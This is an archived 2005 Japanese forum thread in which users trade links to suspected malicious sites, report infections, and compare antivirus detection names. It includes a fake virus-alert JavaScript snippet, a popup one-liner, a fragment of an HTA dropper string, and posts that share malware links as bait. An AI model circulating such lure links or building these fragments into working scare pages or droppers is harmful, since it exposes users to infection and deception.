05/10/03 18:26:31
>>864
著作権が危ない!


866:名無しさん@お腹いっぱい。
05/10/04 13:27:03
カスペルスキークラスのウイルス対策ソフトじゃないと怖くて踏めないサイトだらけだなw
avast!+BitDefender 8 Free Editionでは無理ですw

867:名無しさん@お腹いっぱい。
05/10/04 13:32:22
いつも言ってるがおめえらレベルが貼り付けてるのなんて屁でもないわ
アホくさあ

868:名無しさん@お腹いっぱい。
05/10/04 13:37:15
いつ、何処で言ったんだよ?

869:名無しさん@お腹いっぱい。
05/10/04 19:44:30
これはどうかね。
URLリンク(www.oldandplump.com)

870:名無しさん@お腹いっぱい。
05/10/04 20:10:16
わざと感染させようと思って、WindowsUpdateだけやったSP2でカスタマイズもしないで
丸裸で踏んでいるんだけど、もう1年も何も拾わないんだよな。
ダメだ おまえらは。
やばかったのは去年の5月頃だけ。
まだDownload Jectの脆弱性が完全に対応されないままで市場に情報だけ流れてしまったからな。

871:名無しさん@お腹いっぱい。
05/10/04 23:15:45
URLリンク(www.albinoblacksheep.com)

当方VB2005使用

このURLはゾンビサイト(?)て名前で有名らしいけど
環境によってはトロイ系のウイルス反応出るらしい
おれ試しに踏んでみたけど反応なかった
フラッシュのブラクラ仕掛けてあっただけだった

872:名無しさん@お腹いっぱい。
05/10/05 16:59:51
(・3・) エェー  どんどんお願します。


873:名無しさん@お腹いっぱい。
05/10/06 16:25:59
>>872

 ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) <  これからもYorosiku !!
 | | |  \_____
 (__)___)

874:名無しさん@お腹いっぱい。
05/10/08 01:15:10
ひひひ

875:名無しさん@お腹いっぱい。
05/10/08 01:18:18
有効なファイル(キングソフトアンチウィルスが未対応の新種ウィルス)をお送りいただいた方には、
特製USBメモリ(128MB)をお送りさせていただきます。

皆様のご協力をお願いいたします。
キングソフト サポートセンター
URLリンク(www.kingsoft.jp)

876:名無しさん@お腹いっぱい。
05/10/08 03:02:09
>>875
意図はともかく郵送ってのが良くわからん
こういう事はスピードが大事なのに

877:名無しさん@お腹いっぱい。
05/10/11 14:19:32
>>274
URLリンク(otona-only.com)
( ^∀^)ゲラ

878:名無しさん@お腹いっぱい。
05/10/11 17:59:48
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < パソ壊れた。
 | | |  \_____
 (__)___)


879:名無しさん@お腹いっぱい。
05/10/11 18:04:40
>>878
何で??

880:名無しさん@お腹いっぱい。
05/10/11 22:06:11
amilalaのサイトってここだっけ?頼む
URLリンク(amilala.blogspot.com)

881:名無しさん@お腹いっぱい。
05/10/11 22:52:05
>>880
んー、サイト自体死んでるっぽい。OKを押すと
URLリンク(amilala.blogspot.com)
ここに行ってそのまま。無害っぽい。


882:名無しさん@お腹いっぱい。
05/10/12 11:02:06
>>147
これはひどい。

返信は来るはず。。

From: "kentai@kingsoft.jp" <kentai@kingsoft.jp>
To: <*******@yahoo.co.jp>
Subject: Re: ウィルス検体


キングソフトサポートセンターです。

ご報告ありがとうございます。
いただいたデータもしくはURLを検証いたしております。
対応でき次第、アップデートにて対応する予定です。
ただし、新種と診断された場合は、再度ご連絡を差し上げます。

よろしくお願いします。

883:882
05/10/12 11:03:44
誤爆しちゃいました。すみません

884:名無しさん@お腹いっぱい。
05/10/12 11:05:09
>>147
これはひどい。

返信は来るはず。。

From: "kentai@kingsoft.jp" <kentai@kingsoft.jp>
To: <*******@yahoo.co.jp>
Subject: Re: ウィルス検体


キングソフトサポートセンターです。

ご報告ありがとうございます。
いただいたデータもしくはURLを検証いたしております。
対応でき次第、アップデートにて対応する予定です。
ただし、新種と診断された場合は、再度ご連絡を差し上げます。

よろしくお願いします。

885:884
05/10/12 11:06:26
すみません・・・・・

886:名無しさん@お腹いっぱい。
05/10/13 21:13:42
*危険
URLリンク(picture.michikusa.jp)

このURLを踏んでしまったのですが、どんな悪影響があるのでしょうか?


887:名無しさん@お腹いっぱい。
05/10/13 21:48:11
>>886
ノートンにしか反応しないんだから、きっと精神的ブラクラの類。

888:名無しさん@お腹いっぱい。
05/10/14 00:59:17
<SCRIPT LANGUAGE="JavaScript">
<!--
function Pagein(){
alert("ウィルス警告\n\nExplorerAntiVirusがコンピュータ上でウィルスを検出しました。\nオブジェクト名:\\Temporary Internet Files\\Content.IE5\\...\nウィルス名:VBS.Network.E\n適用した処理:ファイルを修復出来ません。");
}
//-->
</SCRIPT>

…騙しっぽい。

889:名無しさん@お腹いっぱい。
05/10/14 13:29:35
URLリンク(download.kingsoft.jp)
すみません。本当にこんなワクチンソフトあるんですか?
ワクチンソフトの振りしたウイルスだったりしませんよね?

890:名無しさん@お腹いっぱい。
05/10/14 13:44:20
>>889
不具合多いから危険。俺は入れてる

891:名無しさん@お腹いっぱい。
05/10/14 15:47:33
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < 反日ソフトだよ。怖いよ。
 | | |  \_____
 (__)___)


892:名無しさん@お腹いっぱい。
05/10/14 18:16:52
>>891
のまネコおいすー^^

893:名無しさん@お腹いっぱい。
05/10/16 11:19:32
>>876
未対応の新種ウィルスをネットで送るのか
馬鹿ですか

894:名無しさん@お腹いっぱい。
05/10/17 00:14:34
>>893
ヴァカはおまえだ!

895:名無しさん@お腹いっぱい。
05/10/18 21:46:05
開いたけど感染しない。

896:名無しさん@お腹いっぱい。
05/10/18 22:24:25
>>871
JS/Offiz.A トロイだそうです。

897:名無しさん@お腹いっぱい。
05/10/18 22:28:45
>>895
URLリンク(upld2.x0.com)
 ↑クリックして助かったら結婚も球団買収も楽勝だ罠....

898:名無しさん@お腹いっぱい。
05/10/18 23:20:20
今の所セキュリティパッチを全部適用してある場合には、
開いただけで感染するページは発見されていないから 残念!

899:あぼーん
あぼーん
あぼーん

900:名無しさん@お腹いっぱい。
05/10/19 20:31:37

      ___
    /     \
   /   ⌒ ⌒ \
  |     ・ ・   |    / ̄ ̄ ̄ ̄ ̄ ̄ ̄
  |          │ <>>889臭せぇんだよ。
  \     ∪   ノ    \_______
    \____/
   /  TIN  \



901:名無しさん@お腹いっぱい。
05/10/19 20:34:06
って>>889に言おうとしたけど
















番号間違えたOTL


902:名無しさん@お腹いっぱい。
05/10/19 20:42:38
>>899
そんなホストサーバーはねえってよ

903:名無しさん@お腹いっぱい。
05/10/20 00:00:03
googleで「引き続き任務を」って検索すると
マカフィーがトロイの木馬を発見しました
っていうんですけど…


904:名無しさん@お腹いっぱい。
05/10/20 11:55:31
俺も>>826感染しました
どーしよう・・・

905:名無しさん@お腹いっぱい。
05/10/20 12:19:27
>>904
ノートンがvbsウィルスのソースに誤反応3
スレリンク(pcqa板)

906:名無しさん@お腹いっぱい。
05/10/20 12:32:26
本当に感染したのならログ張り付けれ

907:名無しさん@お腹いっぱい。
05/10/20 12:45:42
相手すんな

908:名無しさん@お腹いっぱい。
05/10/20 13:30:22
相手して下さいよ
 
>>905大体読みました
誤反応なんですね ありがとうございました


909:名無しさん@お腹いっぱい。
05/10/20 16:36:02
荒さないで 
URLリンク(b.z-z.jp)

910:名無しさん@お腹いっぱい。
05/10/22 18:48:58
アンカー開いただけでページに飛ぶようにしたいんですけど、
具体的にどうすればいいでしょうか
飛べる様にしてるレスがあったんですが旨くいかなくて。


911:名無しさん@お腹いっぱい。
05/10/22 19:17:18
>>909
何だ? 携帯用の糞面白くもねぇーサイトじゃねぇか.....

912:名無しさん@お腹いっぱい。
05/10/22 21:05:19
ウイルスってどうやって作るの?

913:名無しさん@お腹いっぱい。
05/10/23 08:13:30
>>912
おまえそのものがウイルスです

914:名無しさん@お腹いっぱい。
05/10/23 22:57:49
このレス呼んでたらavastが反応した


915:名無しさん@お腹いっぱい。
05/10/25 13:11:26
>>871
VBS:Malware[Gen]
だってよ。

916:名無しさん@お腹いっぱい。
05/10/26 16:04:03
VBS:Malware[Gen

917:名無しさん@お腹いっぱい。
05/10/28 09:46:03
↓危険です。以前、どっかのスレに貼られてた
URLリンク(www.xybererotica.com)

を間違えて踏んでしまい(Janeで閲覧中)、何かに感染しますた・・普段は
タブブラウザ使用でActive X、Java、JavaScriptなど全部切っているのですが、
標準のブラウザに設定していなかった為、踏んだらIEが起動して・・。
その時インターネットオプションの設定はJava、JavaScriptがオンになっていたので
感染しました・・orz 確か開いた時にSun Javaが勝手に起動したような気がします。

AVGでスキャンして2、3個引っかかったので名前もろくに見ないで削除して
しまって現在に至るのですが、どういうウィルスに感染したのでしょうか・・
AVGで削除したので大丈夫なんでしょうか?心配です・・長文すみません。


918:917
05/10/28 09:57:21
げっ・・wwwから書けばよかった・・すみません。2chブラウザだと
リンクになっちゃってますね(;´д`)

919:名無しさん@お腹いっぱい。
05/10/28 10:25:25
>>917
そこまで防御していながらWindowsUpdateをしていない馬鹿さ加減が笑えません。震度家

920:あぼーん
あぼーん
あぼーん

921:あぼーん
あぼーん
あぼーん

922:名無しさん@お腹いっぱい。
05/10/28 12:42:15
URLリンク(thumbstower.com)

これの駆除方法教えてください。
検出できませんが感染したと思います。

923:名無しさん@お腹いっぱい。
05/10/28 23:47:20
yaromat.com
サイト入って、一番上の項目選んだら変な文字が出て来たんですけどウイルスですか?

924:917
05/10/28 23:53:35
>>919
レスありがとうございます。確かその時もWindowsUpdateで最新の状態に
していたはずなんですが・・AVGで駆除できる種類のものですか?お願い
です・・教えていただけないでしょうか(´Д`;)

レスチェックできなかったので、>>920-921は何だったんでしょうか?気になる。

925:名無しさん@お腹いっぱい。
05/10/29 00:05:17
URLリンク(hasikehasike.fc2web.com)
これ何かな?
教えてください

926:名無しさん@お腹いっぱい。
05/10/29 01:16:23
>>925
この板では鑑定はしません。

ラウンジや初級ネットワーク板の鑑定スレへ
勇気が無くて見られない画像解説スレ Part751
スレリンク(entrance板)l50
勇気がなくて踏めない人のための鑑定スレPart3
スレリンク(hack板)l50

927:名無しさん@お腹いっぱい。
05/10/29 01:38:48
>>926
教えてくれてありがとうございます!

928:あぼーん
05/10/29 16:33:46
あぼーん

929:924
05/10/30 01:31:33
>>917です。どなたか、教えていただけないでしょうか・・。

930:名無しさん@お腹いっぱい。
05/10/30 01:55:41
ここでチェックしてみなさい
URLリンク(livedoor.bravehost.com)

931:名無しさん@お腹いっぱい。
05/10/30 05:56:00
>>930
そんなの甘いな坊や
馬鹿か?

932:名無しさん@お腹いっぱい。
05/10/30 17:28:23
  ∧_∧
 ( ´∀`)  / ̄ ̄ ̄ ̄ ̄
 (    ) < >>930 つまんねー。
 | | |  \_____
 (__)___)


933:名無しさん@お腹いっぱい。
05/10/31 03:12:22
          __,.  -─-- 、_
        , - ' _,´ --─‐-   )
      ,イ´__-___,. -‐ '__,. - '´
      `ー----, - ' ´ ̄ ``  、__
         __,ィ            ヽ. `ヽ.
      ,  '⌒Y  /     、ヽ    ヽ  ヽ.
     /    /  i   /l/|_ハ li  l i   li   ハ
.    // 〃 /l  i|j_,.//‐'/  lTト l、l   j N i |
   {イ  l  / l  li //___    リ_lノ lル' lハ. ソ  ___◎_r‐ロユ
    i| /レ/l l  l v'´ ̄  , ´ ̄`イ  !| ll,ハ └─‐┐ナ┐┌┘ _  ヘ____
    ハ| ll∧ハヽ ト、 '''' r==┐ '''' /l jハ| ll ll    /./┌┘└┬┘└┼──┘ロコ┌i
   〃  ∥ レ'¨´ヽiへ. _ 、__,ノ ,.イ/|/ ノ ll l|   </   ̄L.l ̄ ̄L.lL.!         ┌┘|
  ll    ll {   ⌒ヽ_/ } ー‐<.__  ′  l| ∥
  ∥    ∥ ヽ,   /、 〈   |:::::::| `ヽ      ∥
  ∥       {.  ハ ヽ Y`‐┴、::::v  l      ∥
  ∥      |iヽ{ ヽ_ゾノ‐一’::::ヽ. |      ∥
  ∥      |i:::::`¨´-- :::......:...:.:.::.}|     ∥
  ∥      |i::::::ヽ._:::_:::::::::::::::::::_ノ |     ∥
  ∥      |i::::::::::::i___:::::::::::/  |
           jj::::::::r┴-- `ー‐ '⌒ |
         〃:::::::マ二      _,ノ
       //::::::::::::i ー 一 '´ ̄::.
       ,','::::::::::::::i::::::::::::::::::::::i::::::ヽ

934:929
05/10/31 04:06:55
>>930
・・・・・。

というか、このスレ読んでjpgでも油断できない事を知りますた。
>>917のウィルス or スパイウェアについて教えてくださる親切な方はおられない
のでせうか?

935:名無しさん@お腹いっぱい。
05/10/31 04:37:19
>>934
ウィルス情報&質問 総合スレッド☆Part33
スレリンク(sec板)

936:名無しさん@お腹いっぱい。
05/10/31 17:19:10
>>933

激萌え!!

937:929
05/11/01 01:16:15
>>935
ありがとうございまつ。

938:名無しさん@お腹いっぱい。
05/11/01 05:30:33
URLリンク(www.jword.jp)

939:あぼーん
あぼーん
あぼーん

940:名無しさん@お腹いっぱい。
05/11/06 11:04:03
>>917
Sun Javaも最新にしとけや ドアホ

941:名無しさん@お腹いっぱい。
05/11/07 23:06:56
ココってどうなん?

URLリンク(cgibin.finito.fc2.com)

アクセスするとウイルス送りつけた!!
とか言うページらしいけど…
PC、何も変化無い…
誰か詳細キボン m(_)m

942:名無しさん@お腹いっぱい。
05/11/08 01:19:44
>>941無問題
ソース見れば分かるかと
JavaScriptでメッセージボックス出してるだけ
…なんか多いな、こういうの

943:名無しさん@お腹いっぱい。
05/11/09 00:34:32
URLリンク(www.seriall.com)

944:名無しさん@お腹いっぱい。
05/11/09 18:46:03
スレリンク(f1板)
スレリンク(mokei板)

ウイルスほすぃ。

945:名無しさん@お腹いっぱい。
05/11/10 14:47:41
ここ踏んだらtrojanどうのこうのでどっかに接続されたんですけど、どういう事ですか?
URLリンク(www.ime.st)

946:名無しさん@お腹いっぱい。
05/11/11 07:50:26
>>945
Trojan.Noclose チェイサーで治療を選択したけど
HyperTerminalが数枚立ち上がって、でもTAPI?エラーで接続は
しなくて、Meなので最終的には電源切るしかなかったよ。

947:名無しさん@お腹いっぱい。
05/11/11 15:28:10
>>945
Telnetクライアントが勝手に起動して接続しようとするだけ
実際にはそれらのTelnetサーバーは応答も何もしない
バカにされているだけ 無視で結構

948:名無しさん@お腹いっぱい。
05/11/19 16:11:22
URLリンク(yaplog.bravehost.com)
ここやばいですか?

949:名無しさん@お腹いっぱい。
05/11/20 16:12:56
>>948
このスレでひっかかっただろ

  自称「イケメン&お姉系カップル」のブログ  
スレリンク(diet板)

950:名無しさん@お腹いっぱい。
05/11/21 18:29:21
>>949
コマンド プロンプト
3枚ぐらい開いて、warez.comへ接続。
 軽いウイルスに感染する。

951:名無しさん@お腹いっぱい。
05/11/21 21:02:55
>>710
>>129
URLリンク(www.lakoff.com)
URLリンク(virus.org.ua)
URLリンク(yaplog.bravehost.com)

 |            age                 |
 \_  _____ _______  _____ _/
    ∨      ∨       ∨      ∨
  ∧ ∧      ∧ ∧     ∧ ∧     ∧ ∧
\(*´∀`)  \ ( ・3・)   \(*・∀・)  \( ゚Д゚)
 (__)    (__)    (___)    (__)

952:名無しさん@お腹いっぱい。
05/11/25 19:14:56
URLリンク(sportsnavi.bravehost.com)

ここヤバイですか?なんかDLされたんですけどorz

953:名無しさん@お腹いっぱい。
05/11/25 21:02:37
URLリンク(oshiete.goo.ne.jp)

Bloodhound.Exploit.52 注意


954:名無しさん@お腹いっぱい。
05/11/25 21:06:55
>>953
その追跡者開発コード(Bloodhound.Exploit)という意味は何なんだろうかね?

955:名無しさん@お腹いっぱい。
05/11/25 21:10:14

>>953


URLリンク(www.symantec.com.gt)




956:名無しさん@お腹いっぱい。
05/11/25 21:15:07
>>954
食い物にする警察犬て意味か?

957:名無しさん@お腹いっぱい。
05/11/25 21:19:30
>>955
You have version 8,0,22,0 installed
今はどこでもインストールされるのはこっちにしちゃってるだろ

958:名無しさん@お腹いっぱい。
05/11/26 10:10:20
スパイウェアMediaMax が入ったCDのタイトル名は公表されているの?

959:952
05/11/28 04:56:54
kak.hta';ken=wd+'START
スレリンク(diet板)

960:名無しさん@お腹いっぱい。
05/11/28 12:06:15
>>922
俺も踏んだ
スクリプトもActiveXもJAVAもOFFにしてたから大丈夫かな
詳しい人助けて、、、

961:名無しさん@お腹いっぱい。
05/11/28 18:08:13
>>960
windows フォルダに<ランダムな数字>.EXEみたいな実行ファイルは無い?

962:960
05/11/29 09:32:23
>>961
ありがとう
返事遅れて申し訳ないス。
一様、system、system32フォルダも調べましたが
それらしきものは見当たりませんでした。
あのサイトの悪さの仕組みや、それによって起こる害はどんなものなのかを
教えていただければ有難いス。


963:名無しさん@お腹いっぱい。
05/11/29 10:11:27
>>962
>それによって起こる害はどんなものなのかを
>教えていただければ有難いス。

ざけんじゃねえ てめえで感染して調べやがれ

964:960
05/11/29 10:26:14
感染してみなければ分からないものだとしたら
大変失礼しました。
>>961さんがソースを見て感染の過程と結果を
読んだうえでレスしてくださっているものだと考えたのです。
すいません。

965:961
05/11/29 19:39:08
963 は私じゃありません。
で、ソースを見たわけではなく私自身が感染した結果、<ランダムな数字>.EXE が
生成されていたのでした。 テヘ

966:961
05/11/29 21:24:19
いま、ソースを見てみたんですがbody onload を使ったトラップのようですね。
activeX, java がoff なら大丈夫っぽいっすよ。

・・・じゃあ、私はドコで感染したんだろう(汗

967:名無しさん@お腹いっぱい。
05/12/12 03:43:46
URLリンク(ime.st)
これなんですか?ふんじゃった

968:名無しさん@お腹いっぱい。
05/12/12 12:25:21
 

969:名無しさん@お腹いっぱい。
05/12/13 09:28:36
>>967
もっと踏めばいいじゃないかよ

970:名無しさん@お腹いっぱい。
05/12/13 20:29:45

URLリンク(www.10art-ni.co.jp)
CNETのテンアートニの広告をクリックすると

 『ドライブにディスクがありません。ディスクをドライブに挿入してください。』

というダイアログがひょうじされました。

971:名無しさん@お腹いっぱい。
05/12/13 21:19:13
原因はこれだろ
img src="file:///H|/image/spacer.gif" alt="" width="1" height="3"

972:名無しさん@お腹いっぱい。
05/12/14 13:41:00
 

973:名無しさん@お腹いっぱい。
05/12/14 17:29:15
これワンクリサイトなんだけど、引っかかりました。
その後にPCが立ち上がらなかったりと、PCに不具合が出ます。
ウィルスに感染したんですかね?
感染したならOS再インスコするしかないんですか?

URLリンク(secretroom.v37.jp)

974:名無しさん@お腹いっぱい。
05/12/14 18:48:46
>>973
見た目だけのこけおどしサイト
全部スクリプトとフラッシュで表示している

975:名無しさん@お腹いっぱい。
05/12/15 19:25:59
>>973
ついでに付け加えるとあとは、.gif画像な。

976:名無しさん@お腹いっぱい。
05/12/15 20:45:40
>>973
function confirmPopup() 内、
「18歳以上ですか?」で「18歳以下のお客様のご利用は出来ません~」。
どっちですか。多分「18歳未満の~」の間違いだろうけど。

下の方はちゃんと「18歳未満~」だなw

977:973
05/12/15 21:51:58
みなさんありがとうございます。
ただ、PCの方は完全にぶっ壊れてしまいました。立ち上がらなくなりました。
サイト内の左にある炉利のところ踏んじゃったんですがorz、そこに何か
あったんですかね?ちなみん、オンラインウィルススキャンしてもウィルスは
見つかりませんでした。

978:名無しさん@お腹いっぱい。
05/12/15 21:54:10
危険!HTML.Redlof.Aを発見! (1)
危険!JS_PSYME.Vを発見! (1)
ブラクラチェックが終了しました。

979:名無しさん@お腹いっぱい。
05/12/15 21:54:32
>>977
ウィルスも何もありません 完全無害 関係ない
とっくに何かに感染でもしていたんだろうよ

980:978
05/12/15 21:54:44
どうなりますか?

981:名無しさん@お腹いっぱい。
05/12/15 22:02:26
>>980
セキュリティホールを開けたままにしていなければ関係ありません

982:978
05/12/15 22:02:58
危険!危険?
URLリンク(omegax9sp.hp.infoseek.co.jp)

983:978
05/12/15 22:06:00
>>981
ノートン先生が修復できません  と言っていたのですが大丈夫ですか?

984:名無しさん@お腹いっぱい。
05/12/15 22:07:50
>>982
VBS/Redlofになど感染するやつなど今はいません
Microsoft VMのいつのセキュリティホールだと思ってるんだよ

985:名無しさん@お腹いっぱい。
05/12/15 22:09:27
>>983
WindowsUpdateして最新にしているのなら感染活動出来ません
ノートンなんか無視して結構

986:978
05/12/15 22:10:58
>>984
>>985
ども!!お手数かけました

987:名無しさん@お腹いっぱい。
05/12/16 00:33:20
>>973
こりゃすごいな。
昔見たやつは登録番号とIPアドレスだけの表示だったが、
FlashやGIFアニメで何か仕込んだように見せかけ、Whoisの情報まで
表示するとはな。
一応、進化しているんだなw

988:973
05/12/16 00:45:26
>>979
ありがとうございます。
どうやらPCを酷使し過ぎたのが原因かな?
>>987
ええ、そりゃあもう焦りましたよ。
右手に握っているものの処理だけ済ませてから、大慌てですよ。

989:987
05/12/16 00:49:32
>>988
一応、俺の愛機はウイルス対策ソフト(大手御三家の製品)を有効にしてあるが、
何も検出しなかったぞ。

990:名無しさん@お腹いっぱい。
05/12/16 22:40:53
パソなおさなきゃ♪
URLリンク(jp.winfixer.com)

991:名無しさん@お腹いっぱい。
05/12/16 23:37:02
>>990
WinFixer 2005
URLリンク(jp.winfixer.com)


992:名無しさん@お腹いっぱい。
05/12/17 17:49:40
789おp@「

993:名無しさん@お腹いっぱい。
05/12/17 17:50:50
upupupuupupupuuupupupupuuupuupuppupupup

994:名無しさん@お腹いっぱい。
05/12/17 17:52:00
<a onmouseover=window.open("");>ewrtyui</a>

995:名無しさん@お腹いっぱい。
05/12/17 18:06:35
link:URLリンク(ime.st)
↑のサイトに行った後に、PC起動後に変なのがでてくるようになってしまいました。ノートンとかでやってもでてきてしまいます。どうすれば直るのか教えてください。

996:名無しさん@お腹いっぱい。
05/12/17 18:50:07
>>995
ざけんなよ ばか

997:名無しさん@お腹いっぱい。
05/12/17 19:11:49
>>995
ウイルスバスターでは検出できないねぇ。
何だろうねぇ。
メモ帳のアイコンだねぇ。
実に怪しいねぇ。
そもそも見て危ないってわからないかなぁ。
拡張子がexeだもんねぇ。
こんなのは基本中の基本だねぇ。

998:名無しさん@お腹いっぱい。
05/12/17 23:40:15
>>995
Win32/PSW.Lineage.DN トロイ の亜種
by NOD32

999:名無しさん@お腹いっぱい。
05/12/18 02:16:43
ume

1000:名無しさん@お腹いっぱい。
05/12/18 02:18:04
初の1000ゲット!

1001:1001
Over 1000 Thread
このスレッドは1000を超えました。
もう書けないので、新しいスレッドを立ててくださいです。。。


最新レス表示
レスジャンプ
類似スレ一覧
スレッドの検索
話題のニュース
おまかせリスト
オプション
しおりを挟む
スレッドに書込
スレッドの一覧
暇つぶし2ch